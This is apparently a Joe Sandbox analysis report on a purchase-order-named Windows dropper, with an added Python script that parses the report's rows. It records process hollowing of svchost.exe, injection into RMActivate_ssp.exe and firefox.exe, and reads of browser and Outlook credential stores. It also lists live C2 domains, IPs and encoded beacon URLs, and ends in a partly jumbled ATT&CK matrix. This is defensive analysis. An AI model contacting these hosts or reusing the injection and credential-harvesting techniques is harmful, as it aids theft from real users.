            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe Binary or memory string: WIN_81
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe Binary or memory string: WIN_XP
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe Binary or memory string: WIN_XPe
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe Binary or memory string: WIN_VISTA
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe Binary or memory string: WIN_7
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe Binary or memory string: WIN_8
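The rows in the HIPS / PFW section above (direct syscalls from ZQphKCYQofBW.exe, RWX sections mapped into svchost.exe, RMActivate_ssp.exe and firefox.exe, the APC and thread-context writes, and an svchost.exe launched with the dropper's own command line) and the credential-store rows in this section are each easy to read but tedious to correlate by hand. The script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox tooling: it parses rows in the layout this report uses (extraction may drop the space before the event name and leave the "Jump to behavior" link text after a row), tallies direct syscalls per process, collects every injection edge, flags a child whose command line names a different image than the one actually running, and lists which process touched browser or Outlook credential stores. The sample rows are copied from this report; the regexes and the list of credential stores are this example's own assumptions.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Row layout used by this report: "Source: <image path><event>: <details>".  The
# regexes below are this example's reading of that layout, not Joe Sandbox code.
_SRC = r"^Source:\s*(?P<src>[A-Za-z]:\\.+?\.exe)\s*"
_IMG = r"[A-Za-z]:\\.+?\.exe"
_END = r"(?:Jump to behavior)?$"
PATTERNS = {
    "syscall": re.compile(_SRC + r"(?P<api>Nt\w+): Direct from: (?P<addr>0x[0-9A-Fa-f]+)"),
    "section": re.compile(_SRC + r"Section loaded: NULL target: (?P<dst>" + _IMG
                          + r") protection: (?P<prot>.+?)" + _END),
    "apc":     re.compile(_SRC + r"Thread APC queued: target process: (?P<dst>" + _IMG + r")"),
    "context": re.compile(_SRC + r"Thread register set: target process: (?P<dst>\d+)"),
    "write":   re.compile(_SRC + r"Memory written: (?P<dst>" + _IMG + r") base: (?P<base>[0-9A-Fa-f]+)"),
    "spawn":   re.compile(_SRC + r'Process created: (?P<dst>' + _IMG + r') "(?P<cmd>.+?)"'),
    "file":    re.compile(_SRC + r"File opened: (?P<path>.+?)" + _END),
    "key":     re.compile(_SRC + r"Key opened: (?P<path>.+?)" + _END),
}

# Credential stores a stealer reads directly (assumed list; extend for other browsers).
BROWSER_STORES = ("Login Data", "Local State", "Cookies", "Web Data")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
MAIL_PROFILE_KEY = r"Windows Messaging Subsystem\Profiles"


def base(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


@dataclass
class Triage:
    direct_syscalls: Dict[str, Counter] = field(default_factory=lambda: defaultdict(Counter))
    injections: List[Tuple[str, str, str]] = field(default_factory=list)  # (src, dst, technique)
    spawns: List[Tuple[str, str, str]] = field(default_factory=list)      # (parent, child, cmdline)
    cred_access: List[Tuple[str, str]] = field(default_factory=list)      # (proc, artifact)


def parse_report(rows) -> Triage:
    t = Triage()
    for row in rows:
        line = row.strip()
        for kind, rx in PATTERNS.items():
            m = rx.match(line)
            if not m:
                continue
            src = base(m["src"])
            if kind == "syscall":
                t.direct_syscalls[src][m["api"]] += 1
            elif kind == "section":
                t.injections.append((src, base(m["dst"]), "section mapped " + m["prot"]))
            elif kind == "apc":
                t.injections.append((src, base(m["dst"]), "APC queued"))
            elif kind == "context":
                t.injections.append((src, "pid " + m["dst"], "thread context set"))
            elif kind == "write":
                t.injections.append((src, base(m["dst"]), "memory written at 0x" + m["base"]))
            elif kind == "spawn":
                t.spawns.append((src, base(m["dst"]), m["cmd"]))
            elif kind == "file" and src not in BROWSERS and m["path"].endswith(BROWSER_STORES):
                t.cred_access.append((src, m["path"]))
            elif kind == "key" and MAIL_PROFILE_KEY in m["path"]:
                t.cred_access.append((src, m["path"]))
            break
    return t


def injection_targets(t: Triage) -> List[str]:
    """Images that received a section, APC or memory write: the ones worth dumping."""
    return sorted({dst for _, dst, _ in t.injections if not dst.startswith("pid ")})


def spoofed_command_lines(t: Triage) -> List[Tuple[str, str]]:
    """Children whose command line names a different image than the one running."""
    return [(child, cmd) for _, child, cmd in t.spawns if base(cmd).lower() != child.lower()]


# Rows copied from this report, in the raw layout the page shows.
SAMPLE_ROWS = [
    r'Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior',
    r'Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior',
    r'Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior',
    r'Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior',
    r'Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and writeJump to behavior',
    r'Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior',
    r'Source: C:\Windows\SysWOW64\RMActivate_ssp.exeThread APC queued: target process: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeJump to behavior',
    r'Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D0008Jump to behavior',
    r'Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"Jump to behavior',
    r'Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"Jump to behavior',
    r'Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior',
    r'Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior',
]

if __name__ == "__main__":
    t = parse_report(SAMPLE_ROWS)
    print("direct syscalls:", {p: dict(c) for p, c in t.direct_syscalls.items()})
    print("injection targets:", injection_targets(t))
    print("spoofed command lines:", spoofed_command_lines(t))
    print("credential stores touched:", t.cred_access)
```

The spoofed-command-line check is the quickest tell in this report: svchost.exe is created with the dropper's own path as its command line, so the child's image and its command line disagree (a hollowed process), whereas RMActivate_ssp.exe and firefox.exe are launched normally and then receive RWX sections. The injection-target list is the set of processes whose memory dumps should be carried into the Yara and config-extraction steps; the credential-store list ties the file and registry accesses to the one injected system binary (RMActivate_ssp.exe) that does the harvesting.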

            Remote Access Functionality

            Source: Yara match, file source: 1.2.svchost.exe.350000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, file source: 1.2.svchost.exe.350000.0.unpack, type: UNPACKEDPE
            Source: Yara match, file source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_003091DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_003096E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            MITRE ATT&CK matrix, one line per tactic column, read top to bottom as the report's matrix lays it out (a number in parentheses is the count the report shows in that cell; cells without a number show none):
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
            Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: Native API (3); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
            Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items
            Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2)
            Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture
            Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
            Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Behavior Graph (ID: 1508450; Sample: PO 09110124 EXPRESS SYSTEM-...; Start date: 10/09/2024; Architecture: WINDOWS; Score: 100)

Sample-level network contacts: www.kckartal.xyz; www.golbasi-nakliyat.xyz (Performs DNS queries to domains with low reputation); 17 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 5 other signatures

Process tree:
PO 09110124 EXPRESS SYSTEM-SESB24066.exe (started)
    signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
    -> svchost.exe (started)
        signatures: Maps a DLL or memory area into another process
        -> ZQphKCYQofBW.exe (injected)
            signatures: Found direct / indirect Syscall (likely to bypass EDR)
            -> RMActivate_ssp.exe (started)
                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                -> ZQphKCYQofBW.exe (injected)
                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    network: www.quilo.life 203.161.43.228 (ports 49754, 49755, 49756; VNPT-AS-VNVNPTCorpVN, Malaysia); mfgamecompany.shop 185.173.111.76 (ports 49750, 49751, 49752; TERRATRANSIT-ASDE, Germany); 8 other IPs or domains
                -> firefox.exe (started)

Source | Detection | Scanner | Label | Link
PO 09110124 EXPRESS SYSTEM-SESB24066.exe | 26% | ReversingLabs | |
PO 09110124 EXPRESS SYSTEM-SESB24066.exe | 34% | Virustotal | | Browse
PO 09110124 EXPRESS SYSTEM-SESB24066.exe | 100% | Avira | HEUR/AGEN.1321695 |
PO 09110124 EXPRESS SYSTEM-SESB24066.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label | Link
hm62t.top | 2% | Virustotal | | Browse
bola88site.one | 0% | Virustotal | | Browse
freepicture.online | 1% | Virustotal | | Browse
www.qiluqiyuan.buzz | 1% | Virustotal | | Browse
natroredirect.natrocdn.com | 0% | Virustotal | | Browse
www.hm62t.top | 2% | Virustotal | | Browse
www.monos.shop | 0% | Virustotal | | Browse
www.freepicture.online | 1% | Virustotal | | Browse
www.mfgamecompany.shop | 0% | Virustotal | | Browse
www.318st.com | 0% | Virustotal | | Browse
www.kxshopmr.store | 0% | Virustotal | | Browse
www.bola88site.one | 0% | Virustotal | | Browse
www.726075.buzz | 1% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
http://www.kckartal.xyz/h5qr/?chHT=/bmdZ0vLXnogocV0iYIh9qPv22C1+ePhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5evw/1eyPyHW7+NkDn/WIzzX8wvew4kJYzT8Us=&bd=rj1X_pBPLTnXd0 | 0% | Avira URL Cloud | safe |
http://www.bola88site.one/3lkx/?chHT=RihUS+ZcBcWtP49cUqKa3/5xmWqGYNk0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4ueBHr6qafW/u83WMg9sFtSHOnpje/7KsHpWM=&bd=rj1X_pBPLTnXd0 | 0% | Avira URL Cloud | safe |
http://www.qiluqiyuan.buzz/wjff/?chHT=4KVKOjLTUXvpTd2tw7YgFu7M88ozG6iAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCYIQBHe5WIuBUoW+30QfUJAtM0OLXkJ34ecY=&bd=rj1X_pBPLTnXd0 | 0% | Avira URL Cloud | safe |
http://www.bola88site.one/3lkx/ | 0% | Avira URL Cloud | safe |
http://www.mizuquan.top | 0% | Avira URL Cloud | safe |
http://www.mfgamecompany.shop/lwt6/ | 0% | Avira URL Cloud | safe |
http://www.quilo.life/ftr3/?chHT=7ghTfXuNFdv7bt0cfac8sWAvvgA+iGAttJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+mp46J/Wf0OAVor6kOMcVXs+ErAF0mdrKXqQ=&bd=rj1X_pBPLTnXd0 | 0% | Avira URL Cloud | safe |
http://www.golbasi-nakliyat.xyz/k2vl/ | 0% | Avira URL Cloud | safe |
http://www.kckartal.xyz/h5qr/ | 0% | Avira URL Cloud | safe |
http://www.quilo.life/ftr3/ | 0% | Avira URL Cloud | safe |
http://www.hm62t.top/p39s/ | 0% | Avira URL Cloud | safe |
http://www.golbasi-nakliyat.xyz/k2vl/ | 2% | Virustotal | | Browse
http://www.mizuquan.top/ed2j/ | 0% | Avira URL Cloud | safe |
http://www.golbasi-nakliyat.xyz/k2vl/?chHT=TxupyKnRMohPPcJUOXYiFfym6FYb3U4dGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bNPEHR5AP8gY607qfZYhRyRQHcihpFxABXgI=&bd=rj1X_pBPLTnXd0 | 0% | Avira URL Cloud | safe |
http://www.freepicture.online/xcfw/ | 0% | Avira URL Cloud | safe |
http://www.hm62t.top/p39s/ | 1% | Virustotal | | Browse
http://www.hm62t.top/p39s/?chHT=1N9NMDNpm9Czos0vDuAaxfkyacdu5dmrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV81dYi+UjaGlO+WfnitkWEaBCkm6SMdBoGO9M=&bd=rj1X_pBPLTnXd0 | 0% | Avira URL Cloud | safe |
http://www.freepicture.online/xcfw/?chHT=bjW1F6zberoR1D3Y/XEIKVRbrrv+ro5pHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFAwVPxBpt2RsyemRiOMSAY7rdemSMqYxcM/3o=&bd=rj1X_pBPLTnXd0 | 0% | Avira URL Cloud | safe |
http://www.qiluqiyuan.buzz/wjff/ | 0% | Avira URL Cloud | safe |
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Avira URL Cloud | safe |
http://www.mfgamecompany.shop/lwt6/?chHT=j/d5AuZ+qvKLIrA4zRH7iumC4FPYuWAbkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZRBEg4xmoLeM9ymATeeiPAi1OIEjfa/hQNNA=&bd=rj1X_pBPLTnXd0 | 0% | Avira URL Cloud | safe |
http://www.mizuquan.top/ed2j/?chHT=HnYP2yoU4dt40olvIDuXD48kL/PNXzgkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjaKCOmMM/uBzrxUijYkdqZPZsj8JBjY2qkwg=&bd=rj1X_pBPLTnXd0 | 0% | Avira URL Cloud | safe |
http://www.mfgamecompany.shop/lwt6/ | 1% | Virustotal | | Browse
https://www.mfgamecompany.shop/lwt6/?chHT=j/d5AuZ | 0% | Avira URL Cloud | safe |
http://www.freepicture.online/xcfw/ | 1% | Virustotal | | Browse
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
hm62t.top | 154.23.184.240 | true | true | | unknown
www.kckartal.xyz | 104.21.20.125 | true | true | | unknown
www.quilo.life | 203.161.43.228 | true | true | | unknown
bola88site.one | 172.96.191.39 | true | true | | unknown
www.mizuquan.top | 43.242.202.169 | true | true | | unknown
freepicture.online | 89.58.49.1 | true | true | | unknown
mfgamecompany.shop | 185.173.111.76 | true | true | | unknown
www.726075.buzz | 47.57.185.227 | true | true | | unknown
www.qiluqiyuan.buzz | 161.97.168.245 | true | true | | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | true | | unknown
www.golbasi-nakliyat.xyz | unknown | unknown | true | | unknown
www.freepicture.online | unknown | unknown | true | | unknown
www.monos.shop | unknown | unknown | true | | unknown
www.hm62t.top | unknown | unknown | true | | unknown
www.mfgamecompany.shop | unknown | unknown | true | | unknown
www.bola88site.one | unknown | unknown | true | | unknown
www.318st.com | unknown | unknown | true | | unknown
www.kxshopmr.store | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.bola88site.one/3lkx/?chHT=RihUS+ZcBcWtP49cUqKa3/5xmWqGYNk0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4ueBHr6qafW/u83WMg9sFtSHOnpje/7KsHpWM=&bd=rj1X_pBPLTnXd0 | true | Avira URL Cloud: safe | unknown
http://www.qiluqiyuan.buzz/wjff/?chHT=4KVKOjLTUXvpTd2tw7YgFu7M88ozG6iAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCYIQBHe5WIuBUoW+30QfUJAtM0OLXkJ34ecY=&bd=rj1X_pBPLTnXd0 | true | Avira URL Cloud: safe | unknown
http://www.bola88site.one/3lkx/ | true | Avira URL Cloud: safe | unknown
http://www.kckartal.xyz/h5qr/?chHT=/bmdZ0vLXnogocV0iYIh9qPv22C1+ePhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5evw/1eyPyHW7+NkDn/WIzzX8wvew4kJYzT8Us=&bd=rj1X_pBPLTnXd0 | true | Avira URL Cloud: safe | unknown
http://www.mfgamecompany.shop/lwt6/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.quilo.life/ftr3/?chHT=7ghTfXuNFdv7bt0cfac8sWAvvgA+iGAttJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+mp46J/Wf0OAVor6kOMcVXs+ErAF0mdrKXqQ=&bd=rj1X_pBPLTnXd0 | true | Avira URL Cloud: safe | unknown
http://www.golbasi-nakliyat.xyz/k2vl/ | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.kckartal.xyz/h5qr/ | true | Avira URL Cloud: safe | unknown
http://www.quilo.life/ftr3/ | true | Avira URL Cloud: safe | unknown
http://www.hm62t.top/p39s/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.mizuquan.top/ed2j/ | true | Avira URL Cloud: safe | unknown
http://www.golbasi-nakliyat.xyz/k2vl/?chHT=TxupyKnRMohPPcJUOXYiFfym6FYb3U4dGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bNPEHR5AP8gY607qfZYhRyRQHcihpFxABXgI=&bd=rj1X_pBPLTnXd0 | true | Avira URL Cloud: safe | unknown
http://www.freepicture.online/xcfw/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.hm62t.top/p39s/?chHT=1N9NMDNpm9Czos0vDuAaxfkyacdu5dmrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV81dYi+UjaGlO+WfnitkWEaBCkm6SMdBoGO9M=&bd=rj1X_pBPLTnXd0 | true | Avira URL Cloud: safe | unknown
http://www.freepicture.online/xcfw/?chHT=bjW1F6zberoR1D3Y/XEIKVRbrrv+ro5pHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFAwVPxBpt2RsyemRiOMSAY7rdemSMqYxcM/3o=&bd=rj1X_pBPLTnXd0 | true | Avira URL Cloud: safe | unknown
http://www.qiluqiyuan.buzz/wjff/ | true | Avira URL Cloud: safe | unknown
http://www.mfgamecompany.shop/lwt6/?chHT=j/d5AuZ+qvKLIrA4zRH7iumC4FPYuWAbkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZRBEg4xmoLeM9ymATeeiPAi1OIEjfa/hQNNA=&bd=rj1X_pBPLTnXd0 | true | Avira URL Cloud: safe | unknown
http://www.mizuquan.top/ed2j/?chHT=HnYP2yoU4dt40olvIDuXD48kL/PNXzgkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjaKCOmMM/uBzrxUijYkdqZPZsj8JBjY2qkwg=&bd=rj1X_pBPLTnXd0 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.mizuquan.top | ZQphKCYQofBW.exe, 00000007.00000002.3541474602.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | RMActivate_ssp.exe, 00000003.00000002.3543103481.0000000004412000.00000004.10000000.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.0000000004142000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.mfgamecompany.shop/lwt6/?chHT=j/d5AuZ | RMActivate_ssp.exe, 00000003.00000002.3543103481.0000000004280000.00000004.10000000.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.0000000003FB0000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RMActivate_ssp.exe, 00000003.00000002.3544937524.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
203.161.43.228 | www.quilo.life | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
172.96.191.39 | bola88site.one | Canada | 59253 | LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | true
104.21.20.125 | www.kckartal.xyz | United States | 13335 | CLOUDFLARENETUS | true
47.57.185.227 | www.726075.buzz | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
89.58.49.1 | freepicture.online | Germany | 5430 | FREENETDEfreenetDatenkommunikationsGmbHDE | true
154.23.184.240 | hm62t.top | United States | 174 | COGENT-174US | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | true
185.173.111.76 | mfgamecompany.shop | Germany | 42366 | TERRATRANSIT-ASDE | true
43.242.202.169 | www.mizuquan.top | Hong Kong | 40065 | CNSERVERSUS | true
161.97.168.245 | www.qiluqiyuan.buzz | United States | 51167 | CONTABODE | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1508450
Start date and time: 2024-09-10 08:46:42 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO 09110124 EXPRESS SYSTEM-SESB24066.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@16/10
                      EGA Information:
                      • Successful, ratio: 75%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 55
                      • Number of non-executed functions: 299
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
